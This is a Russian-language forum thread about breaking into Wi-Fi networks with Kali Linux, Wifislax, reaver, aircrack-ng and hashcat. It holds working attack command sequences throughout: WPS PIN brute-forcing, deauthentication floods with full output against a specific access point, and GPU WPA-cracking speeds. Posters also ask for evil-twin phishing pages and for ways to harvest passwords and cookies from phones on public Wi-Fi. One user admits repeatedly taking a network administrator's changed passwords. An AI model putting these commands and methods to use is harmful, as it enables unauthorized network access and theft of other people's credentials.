Подскажите,какой сейчас самый свежий драйвер для Ralink 3070?Сайт Ralink вообще странный,зайти не могу на него((
Вот http://www.mediatek.com/AmazonS3/Downloads/windows/IS_Setup_ICS_050615_1.5.39.126.exe незнаю последний или нет, но хороший медиатековский драйвер.
Ребята, подскажите.
Есть TL-WR741ND с DD-WRT v24-sp2 (01/10/14) std на борту.
Есть 2 точки с одинаковым ESSID: ASUS(разные хозяева) и разным уровнем сигнала(пароли известны).
..
Можно ли в DD-WRT подключатся клиентом по BSSID?
Если пытаюсь подключатся по ESSID, выбирается точка с лучшим сигналом, и лупит в неё чужой пароль до бесконечности...(нужно подключится к точке с сигналом послабее)
Люди добрые, подскажите пожалуйста. Ситауция такого плана: допустим, я просканировал сети вокруг, нашёл N количество сетей, все закрытые.
Имеется текстовый файл, в нём N штук пин-кодов wps. Никто не встречал такой скрипт: сканирует сети вокруг, и потом из этого файла к каждой сети, где не залочен wps пробует подобрать пин-код, естественно проверяя на wps. То есть имеется 10 сетей с wps, в файле 10 пин-кодов. 10х10=100 попыток подбора по файлу с кодами.
А после окончания работы, вывод лога с успешными попытками.
Triton_Mgn
27.10.2015, 19:24
Люди добрые, подскажите пожалуйста. Ситауция такого плана: допустим, я просканировал сети вокруг, нашёл N количество сетей, все закрытые.
Имеется текстовый файл, в нём N штук пин-кодов wps. Никто не встречал такой скрипт: сканирует сети вокруг, и потом из этого файла к каждой сети, где не залочен wps пробует подобрать пин-код, естественно проверяя на wps. То есть имеется 10 сетей с wps, в файле 10 пин-кодов. 10х10=100 попыток подбора по файлу с кодами.
А после окончания работы, вывод лога с успешными попытками.
Ты говоришь про reaver-ng, у него имеется база пин кодов 10000 штук. как каааак? ты веберешь 10 пинкодов из 10000? су-е фа?
Ты говоришь про reaver-ng, у него имеется база пин кодов 10000 штук. как каааак? ты веберешь 10 пинкодов из 10000? су-е фа?
Вы меня не правильно поняли. Да, мб и ривер, но надо заставить его автоматом пройтись по 10 найденным сетям, взяв пинкоды из левого текстовика.
upd: объясню на пальцах, что надо:
Просканировал, нашёл 2 точки доступа (пример):
АА:AA:AA:AA:AA
VV:VV:VV:VV:VV
Есть 2 пин-кода в файлике:
12345678
87654321
Что делаем ручками, чтобы перебрать эти 2 пина? Это: (пример)
reaver -i mon0 -b АА:AA:AA:AA:AA -p 12345678
reaver -i mon0 -b АА:AA:AA:AA:AA -p 87654321
reaver -i mon0 -b VV:VV:VV:VV:VV -p 87654321
reaver -i mon0 -b VV:VV:VV:VV:VV -p 87654321
Как эти 4 действия автоматизировать, не вводя каждый раз эти команды? Нужен скрипт, который просканирует сети, выберет оттуда сети с wps, откроет указанный текстовик и прогонит эти пины по каждый точке доступа. Вот
Triton_Mgn
27.10.2015, 20:31
Вы меня не правильно поняли. Да, мб и ривер, но надо заставить его автоматом пройтись по 10 найденным сетям, взяв пинкоды из левого текстовика.
upd: объясню на пальцах, что надо:
Просканировал, нашёл 2 точки доступа (пример):
АА:AA:AA:AA:AA
VV:VV:VV:VV:VV
Есть 2 пин-кода в файлике:
12345678
87654321
Что делаем ручками, чтобы перебрать эти 2 пина? Это: (пример)
reaver -i mon0 -b АА:AA:AA:AA:AA -p 12345678
reaver -i mon0 -b АА:AA:AA:AA:AA -p 87654321
reaver -i mon0 -b VV:VV:VV:VV:VV -p 87654321
reaver -i mon0 -b VV:VV:VV:VV:VV -p 87654321
Как эти 4 действия автоматизировать, не вводя каждый раз эти команды? Нужен скрипт, который просканирует сети, выберет оттуда сети с wps, откроет указанный текстовик и прогонит эти пины по каждый точке доступа. Вот
Сначала скажите откуда 2 пин кода в файлике? Все это реализовано в Wifislax - GoyScriptWPS и Pixie script. Ведь явно Вы не с потолка засунули в файл 2 Pinа.
Сначала скажите откуда 2 пин кода в файлике? Все это реализовано в Wifislax - GoyScriptWPS и Pixie script. Ведь явно Вы не с потолка засунули в файл 2 Pinа.
Неважно откуда пины в файле. Они лишь нужны для подбора. Насчёт wifislax'a спасибо, не смотрел никогда в сторону этих сборок, всегда ручками.
Triton_Mgn
27.10.2015, 20:55
Неважно откуда пины в файле. Они лишь нужны для подбора. Насчёт wifislax'a спасибо, не смотрел никогда в сторону этих сборок, всегда ручками.
Смотрите PixieScript влом за 20 секунд, не действует на Broadcom, Реалтек - точно, остальные поддаются , тем не менее лучше сначала попробовать Пикси, не ломаюся TP-link последние модели . Dir-615.
Eltex - NTP-RG-1402G-W:rev.C - ростелекомовский оптико-волоконный лочится, через 3 пина, и даже с reaver трудно работать.
. все они на вышеназванных чипах, из личного опыта.
Вот http://www.mediatek.com/AmazonS3/Downloads/windows/IS_Setup_ICS_050615_1.5.39.126.exe незнаю последний или нет, но хороший медиатековский драйвер.
та....что это за старая версия,у меня вон,начинается с 5......версия,твоя версия с 1.....
что это за старая версия,у меня вон,начинается с 5......версия,твоя версия с 1.....
А если внимательно посмотреть, это версия от лета этого года 5,39,....
А ваша старая....
Гы.
Triton_Mgn
28.10.2015, 00:33
А если внимательно посмотреть, это версия от лета этого года 5,39,....
А ваша старая....
Гы.
Payer не надо обращать внимания, как видите выше, оказывается драйвер для RT3070 не играет своей роли, и замена старого мною данного - выливается в мнимое повышение или уменьшение хз чего) Фактов нет, картинок тоже, предлагал показать результаты бесплатного Acrylic Wi-Fi Home, тем не менее наши друзья отказываются. Ну а если говорить совсем серьезно, зачем обвинять человека в чем-то, чем предложить-выложить свои....
valokorden
28.10.2015, 15:15
существуют ли утилиты наподобие InSSIDer только не под винду а под kali linux? при помощи InSSIDer удобно выставить направленную антенну так чтоб сигнал от определенной точки шел непрерывно (по графику видно) и когда сигнал слабый удается получить стабильную связь.
ps сниффер в gerix wifi cracker умеет это делать (sniff_dump, параметр RXQ) но не знаю как его запустить через командную строку.
есть ещё прога horst она почти как inssider
Хочу доставить вторую карточку GTX980, надо ли их объединять в SLI или hashcat работает с каждой персонально?
Хочу доставить вторую карточку GTX980, надо ли их объединять в SLI или hashcat работает с каждой персонально?
нет необходимости объединять их в SLI все и так работать будет. Отпишись о скорости на GTX 980. И вообще если поставить 1 видеокарту от AMD а другую от Nvidia hashcat будет с ними нормально работать?
здравствуйте. что означает failed to associate with...? везде пишут что изза плохой связи, но это не связь. все работало, но админ чтото сделал в настройках роутера. wash показывает что wps включен и блокировки нет. подскажите что тут можно сделать???
Скорость GTX980 всем давно известна, в зависимости от релиза, разгона и заводских возможностей boost это 180 тыс ключей WPA, 145 на 970, 144 на R280X. Проверял на wifislaax 4.11.1 с поставляемыми дровами и hashcat 1.37.
Две карты работать вместе не будут, так как запускаемые файлы у хешкета разные(cudaHashcat и oclHashcat)
Так же ключи сильно зависят от реализации hashcat и версии дров, я пока не сильно запаривался, но конечно для 980-970 ожидал немного большего, чем имею. Кто-то добивался в стоке на 970 155 тыс. Но все таки нвидиа рулит, хотя бы тем, что при загрузке 100% карта греется на 67 градусов, при той же нагрузке АТИ вырубается на 90 градусах либо шпарит на fan 90%. Приходится системник выносить на балкон, либо ставить 2-3 дополнительных кулера, для стабилизации работы.
Нвидиа проживет дольше.
erwerr2321
29.10.2015, 13:08
здравствуйте. что означает failed to associate with...? везде пишут что изза плохой связи, но это не связь. все работало, но админ чтото сделал в настройках роутера. wash показывает что wps включен и блокировки нет. подскажите что тут можно сделать???
Пробуй так:
1 окно Терминала:
airodump-ng -c x wlan0
2 окно Терминала:
aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX wlan0
3 окно Терминала:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c x -A -vvv --no-nacks --win7
думаю, x - ы расшифровывать не нужно, разберётесь...))
Скорость GTX980 всем давно известна, в зависимости от релиза, разгона и заводских возможностей boost это 180 тыс ключей WPA, 145 на 970, 144 на R280X. Проверял на wifislaax 4.11.1 с поставляемыми дровами и hashcat 1.37.
Две карты работать вместе не будут, так как запускаемые файлы у хешкета разные(cudaHashcat и oclHashcat)
Так же ключи сильно зависят от реализации hashcat и версии дров, я пока не сильно запаривался, но конечно для 980-970 ожидал немного большего, чем имею. Кто-то добивался в стоке на 970 155 тыс. Но все таки нвидиа рулит, хотя бы тем, что при загрузке 100% карта греется на 67 градусов, при той же нагрузке АТИ вырубается на 90 градусах либо шпарит на fan 90%. Приходится системник выносить на балкон, либо ставить 2-3 дополнительных кулера, для стабилизации работы.
Нвидиа проживет дольше.
М да!!! Во первых технология CUDA присутствует как у AMD так и у Nvidia! и исполняемый файл тоже один, а обычных хешкат это под проц он. По поводу крутости Nvidia не спорю они обгоняют но и по цене дороже какой смысл брать 980 на 150-180 kHs за 30к если за эту цену можно 2х290х и скорость у них будет под 300 kHs в добавок чтобы не грелось поставь СВО и тишина и видяха не в напряге.
Хочу попробовать Rasberi PI2 под кали кто-нибудь пользовался что посоветовать сможет?
Andrey9999
30.10.2015, 05:08
М да!!! Во первых технология CUDA присутствует как у AMD так и у Nvidia!
у AMD OpenCL
Пробуй так:
1 окно Терминала:
airodump-ng -c x wlan0
2 окно Терминала:
aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX wlan0
3 окно Терминала:
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c x -A -vvv --no-nacks --win7
думаю, x - ы расшифровывать не нужно, разберётесь...))
После ассоциации выдает такое:
Trying pin 12345670
Sending EAPOL START request
Warning: Receive timeout occerred
и так повторяет дальше, только уже без trying pin.. с этим что можно сделать?
erwerr2321
30.10.2015, 10:18
После ассоциации выдает такое:
Trying pin 12345670
Sending EAPOL START request
Warning: Receive timeout occerred
и так повторяет дальше, только уже без trying pin.. с этим что можно сделать?
ага..., а ты точно попробовал, предложенный мной способ?!
ага..., а ты точно попробовал, предложенный мной способ?!
ну да, все так и делал.
Каждый сам пусть выбирает, что себе ставить, АТИ или Нвидиа. Я свой выбор сделал, бабло не жмет.
Вопрос еще один, насколько важен режим работы PCI-E слота? Дело в том, что на моей маме при включенном 16x, второй с большой вероятностью перейдет в 8 или даже 4х. Скорость работы от этого падает? Не хочу мать менять, а то за матерью менять придется и проц, и память - а это уже порядка 50к
erwerr2321
30.10.2015, 11:35
ну да, все так и делал.
Я б, конечно, посмотрел, что ты там наделал...
Значит, либо ошибся ты где-то, либо в aireplay-ng -1 5 - играйся с этим параметром, пробуй другое значение!
Обычно, если всё сделать правильно, проходят всякие залипания и траблы с ассоциированием...,
после чего точка либо лочится, либо идёт нормальный перебор!
Да, конечно, есть ещё один вариант, ты слишком далеко от точки...
Вот ты говоришь:
везде пишут что изза плохой связи, но это не связь.
А что же это тогда? Какой-то заговор?! Наваждение?!
- Вряд ли...
Далее:
все работало, но админ чтото сделал в настройках роутера.
Слелал что? Перенёс роутер в другое место!? Сменил pin и password!? Прошивку!? Роутер!?
- Очень может быть....
И наконец:
wash показывает что wps включен и блокировки нет. подскажите что тут можно сделать???
А что именно ты хочешь сделать?!
- Можно, например, взять и подключиться! Тем более, как ты говоришь, тебе известен pin! Возьми тогда какой-нибудь QSS и подключись!
И не морочь голову ни себе и ни людям!
Я б, конечно, посмотрел, что ты там наделал...
Значит, либо ошибся ты где-то, либо в aireplay-ng -1 5 - играйся с этим параметром, пробуй другое значение!
Обычно, если всё сделать правильно, проходят всякие залипания и траблы с ассоциированием...,
после чего точка либо лочится, либо идёт нормальный перебор!
Еще раз)):
перевер карту в мон0, открыл первое окно терминала, airodump-ng -c 4 mon0, открываю второе окно терминала: aireplay-ng -1 5 -a (mac точки) mon0, третье окно: reaver -i mon0 -b(mac) -c 4 -A -vvv --no-nacks --win7. знаю пин код и после win7 -p (pin). происходит ассоциация, затем пин этот и начинается вот эта фигня с таймаутом...
Точка не далеко. сигнал сильный показывает, я ей год пользовался, админ чтото намутил..
erwerr2321
30.10.2015, 12:14
я ей год пользовался, админ чтото намутил..
Ты к ней целый год по пину подключался!?!
А что там админ намутил...?! Так откуда нам знать...!!
Ты к ней целый год по пину подключался!?!
А что там админ намутил...?! Так откуда нам знать...!!
он менял пароли постоянно, я через ривер по пину новый пароль узнавал
erwerr2321
30.10.2015, 12:21
он менял пароли постоянно, я через ривер по пину новый пароль узнавал
Ну значит, в этот раз он сменил пин...мог легко обновить прошивку и т.д.
Ты ж сам виноват.. .достал его своими торрентами и танками
Ну значит, в этот раз он сменил пин...мог легко обновить прошивку и т.д.
Ты ж сам виноват.. .достал его своими торрентами и танками
я там вообще редко сидел. А если прошивку поменял, то уже ничего не сделать?
erwerr2321
30.10.2015, 12:39
я там вообще редко сидел. А если прошивку поменял, то уже ничего не сделать?
лови ХШ, заодно и pin узнаешь...
лови ХШ, заодно и pin узнаешь...
в общем после ассоциации с timeout occurred бесполезно что то делать? ХШ чем ловить?
Хотя смысл от пина, если не идет подбор?
Вот нашел статейку: http://webware.biz/?p=5187 называется: "Penetrator-WPS: новый инструмент для атаки на WPS в Kali Linux" основан на Pixie Dust. Вопрос: стоит ли проверять на tp-link или это гиблое дело? И в целом мне просто мозгов не хватает чтобы понять как ломают эти триклятые tp-link, кроме как через брут хш... =( Ну ок, есть еще linset, но каков был мой батхерд когда я увидел что скрипт не редиректит на 192.168.1.1, а тупо пишет жертве что "страница недоступна", подскажите камрады, есть ли похожие скрипты для evil twin с возможностью самому наваять http страничку?(желательно под wifislax =) )
PS: и как мне подсказивает моя интуиция, без wifi-усилителя, результата при evil twin атаке добиться будет сложновато, так ли это? =)
в общем после ассоциации с timeout occurred бесполезно что то делать? ХШ чем ловить?
Хотя смысл от пина, если не идет подбор?
Wifite отлично справляеться с отловом ХШ, Metropolis понравился, ну или тот же линсет неплохо отлавливает хш (если ОСь WiFiSlax эти тулзы идут из под коробки, да и вообще там целый раздел для WPA c добрым десятком утилит).
Подскажите такой вопрос, а как реализовать сбор паролей с мобильных устройств (android, iphone) через ПК (ноутбук) в общественном месте. Все что с ПК я разобрался (перехват cookieremix** средствами Wireshark и Cain & Abel).
Также интересует возможность сделать ПК (ноутбук) раздающим wifi - к нему подключаются с мобильных устройств (android, iphone) - как получить пароли, возможно ли это, если вход с пк то у меня получилось.
snabgenech
02.11.2015, 21:28
Форумчане помогите не получается перейти в режим монитора.
Загружаюсь с флешки kali linux 2.0
Адаптер wifi tl-wn8200nd
Сетевая Atheros ar9485wb
root@kali:~# iwconfig
wlan1mon IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
root@kali:~# airmon-ng start wlan1
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1149 NetworkManager
1254 wpa_supplicant
1496 avahi-daemon
1497 avahi-daemon
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1 wlan1 rtl8192cu
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr b8:88:e3:5f:c2:ec
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:960 (960.0 B) TX bytes:960 (960.0 B)
wlan0 Link encap:Ethernet HWaddr e8:03:9a:fd:f1:a0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
wlan1mon Link encap:Ethernet HWaddr c4:6e:1f:27:68:bb
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
root@kali:~# lspci
00:00.0 Host bridge: Intel Corporation 3rd Gen Core processor DRAM Controller (rev 09)
00:01.0 PCI bridge: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor PCI Express Root Port (rev 09)
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
00:14.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB xHCI Host Controller (rev 04)
00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04)
00:1a.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #2 (rev 04)
00:1b.0 Audio device: Intel Corporation 7 Series/C210 Series Chipset Family High Definition Audio Controller (rev 04)
00:1c.0 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 1 (rev c4)
00:1c.1 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 2 (rev c4)
00:1d.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #1 (rev 04)
00:1f.0 ISA bridge: Intel Corporation HM76 Express Chipset LPC Controller (rev 04)
00:1f.2 SATA controller: Intel Corporation 7 Series Chipset Family 6-port SATA Controller [AHCI mode] (rev 04)
00:1f.3 SMBus: Intel Corporation 7 Series/C210 Series Chipset Family SMBus Controller (rev 04)
01:00.0 VGA compatible controller: Advanced Micro Devices, Inc. [AMD/ATI] Thames [Radeon HD 7500M/7600M Series] (rev ff)
02:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 09)
03:00.0 Network controller: Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
В ВТ5 адаптер не видит вообще.(((
Заранее спасибо.
zxDENIxz
02.11.2015, 23:51
простите за оффтоп, хочу собрать злую машину на 4 видяхах. посоветуйте отличную видяху (цена до 50к) что нибудь из ulmarta)))
ps/ для брута паролей
IgorBorNN
03.11.2015, 02:04
Доброго здравия !!! То что написано в #669 такая же проблема, все перебрал и вот результат:
phy0 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0mon on [phy0]wlan0monmon)
(mac80211 station mode vif disabled for [phy0]wlan0mon)
Уважаемые знатоки, пожалуйста подскажите куда копать и что сделать !!! С уважением !
Форумчане помогите не получается перейти в режим монитора.
Загружаюсь с флешки kali linux 2.0
Адаптер wifi tl-wn8200nd
Сетевая Atheros ar9485wb
В ВТ5 адаптер не видит вообще.(((
Заранее спасибо.
Доброго здравия !!! То что написано в #669 такая же проблема, все перебрал и вот результат:
phy0 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0mon on [phy0]wlan0monmon)
(mac80211 station mode vif disabled for [phy0]wlan0mon)
Уважаемые знатоки, пожалуйста подскажите куда копать и что сделать !!! С уважением !
пробовали так?
ifconfig wlan0mon down
iwconfig wlan0mon mode monitor
ifconfig wlan0mon up
http://stackoverflow.com/questions/32025472/airodump-ng-wlan0mon-doesnt-work
valokorden
03.11.2015, 13:04
Доброго здравия !!! То что написано в #669 такая же проблема, все перебрал и вот результат:
phy0 wlan0mon ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0mon on [phy0]wlan0monmon)
(mac80211 station mode vif disabled for [phy0]wlan0mon)
Уважаемые знатоки, пожалуйста подскажите куда копать и что сделать !!! С уважением !
airmon-ng check kill
aircrack-ng check kill
ну и дальше как обычно. Тут уже много раз это обсасывалось, буквально страниц 5 назад))
Ребята подскажите пож согласно моего поста выше, возможен ли вход в соц сеть с перехваченных данных с мобильных устройств на пк. Если вход с ПК то псе работает а мобильные устройства разобраться не могу.
здесь показаны команы в линуксе, которая ддосит wifi
вот так
а как такое же сделать в windows ? командами без посторонних программ ?
Грабитель
05.11.2015, 11:00
Вопрос по смене mac адреса у wi-fi адаптера.
Меняю такими командами:
ifconfig wlan0 down
ifconfig wlan0 hw ether 33:33:33:33:33:33
ifconfig wlan0 up
Далее смотрю через ifconfig, мак адрес поменялся нормально.
Затем, запускаю airmon-ng start wlan0
Далее снова набираю ifconfig и наблюдаю в устройстве mon0 всего одну строку HWaddr МОЙ_МАК_левые_значения
Не имею возможности посмотреть в эфире, какой у меня там на самом деле MAC адрес, и не могу понять, мак адрес на самом деле для эфира меняется, или он лишь поменялся на реальном адаптере, а на виртуальном остался прежним и с моего же мак адреса идёт атака на вай фай?
UNIXTREID
05.11.2015, 13:00
А как насчёт macchanger'а ? Правда, у меня с ним была проблема другая: даже после просто подключения к какой-то точке под липовым mac'ом и отключения от неё (например, после потери связи на несколько секунд) mac снова сбрасывается в родной и приходится его менять.
Triton_Mgn
05.11.2015, 13:22
здесь показаны команы в линуксе, которая ддосит wifi
вот так
а как такое же сделать в windows ? командами без посторонних программ ?
Ddos-ит ? Читайте aircrack-ng , это не есть ddos, а тупо забивание эфира. Смысл подговнить?
Triton_Mgn
05.11.2015, 13:27
Вопрос по смене mac адреса у wi-fi адаптера.
Меняю такими командами:
ifconfig wlan0 down
ifconfig wlan0 hw ether 33:33:33:33:33:33
ifconfig wlan0 up
Далее смотрю через ifconfig, мак адрес поменялся нормально.
Затем, запускаю airmon-ng start wlan0
Далее снова набираю ifconfig и наблюдаю в устройстве mon0 всего одну строку HWaddr МОЙ_МАК_левые_значения
Не имею возможности посмотреть в эфире, какой у меня там на самом деле MAC адрес, и не могу понять, мак адрес на самом деле для эфира меняется, или он лишь поменялся на реальном адаптере, а на виртуальном остался прежним и с моего же мак адреса идёт атака на вай фай?
macchanger http://compiling.ru/solutions/izmenenie-mac-adresa-s-pomoshhyu-komandy-linux-macchanger/? причем менять надо ПОСЛЕ включения режима монитора именно на mon0. Думаю разберетесь, что в статье описан интерфейс eth0
Ddos-ит ? Читайте aircrack-ng , это не есть ddos, а тупо забивание эфира. Смысл подговнить?
раз подключиться нельзя, то получается это отказ в обслуживании - ddos
binarymaster
05.11.2015, 16:37
Далее снова набираю ifconfig и наблюдаю в устройстве mon0 всего одну строку HWaddr МОЙ_МАК_левые_значения
MAC-адрес monitor-интерфейса изменить не получится. Просто продолжайте работать с ним.
Triton_Mgn
05.11.2015, 21:08
раз подключиться нельзя, то получается это отказ в обслуживании - ddos
Можно и с кувалдой прийти разбить поутер, по вашему это тоже Ddos атака, и вообще хоты бы разобрались с чем имеете дело. aircrack-ng
Triton_Mgn
05.11.2015, 21:10
MAC-адрес monitor-интерфейса изменить не получится. Просто продолжайте работать с ним.
binarymaster при всем уважении очень даже получится. Сейчас покажу
Triton_Mgn
05.11.2015, 21:31
http://rghost.ru/private/68dtvFdyX/2a51589560faf2e02e96260110b70a7e
Triton_Mgn
05.11.2015, 22:00
Каждый сам пусть выбирает, что себе ставить, АТИ или Нвидиа. Я свой выбор сделал, бабло не жмет.
Вопрос еще один, насколько важен режим работы PCI-E слота? Дело в том, что на моей маме при включенном 16x, второй с большой вероятностью перейдет в 8 или даже 4х. Скорость работы от этого падает? Не хочу мать менять, а то за матерью менять придется и проц, и память - а это уже порядка 50к
Тебе же бабло не жмет, что вы нам говорите, о каком то порядку в 50 к????? Режим pci слота на подбор не влияет...
http://rghost.ru/private/68dtvFdyX/2a51589560faf2e02e96260110b70a7e
а что видео то боком
snabgenech
05.11.2015, 22:14
Уважаемые форумчане!
Ни как не могу поймать хендшейки,я новичок, подскажите что не так делаю.
Заранее спс.
root@neo:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
wlan1 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
root@neo:~# airmon-ng check kill
Killing these processes:
PID Name
819 wpa_supplicant
root@neo:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
wlan1 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
root@neo:~# airmon-ng start wlan1
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1 wlan1 rtl8192cu
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
root@neo:~# airmon-ng start mon
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1 wlan1mon rtl8192cu
root@neo:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Power Management:eek:n
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
root@neo:~# airodump-ng mon
Interface mon:
ioctl(SIOCGIFINDEX) failed: No such device
root@neo:~# airodump-ng wlan1mon
CH 9 ][ Elapsed: 18 mins ][ 2015-11-05 19:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:CB:84:D2 -22 5040 9300 0 6 54e WPA2 CCMP PSK DSL_2640NRU
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 -30 0e- 0e 326 9352
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:43:32 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:43:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:44:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11
19:44:22 wlan1mon is on channel 11, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:44:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11
19:44:33 wlan1mon is on channel 11, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:44:37 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:44:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:44 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:44:46 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
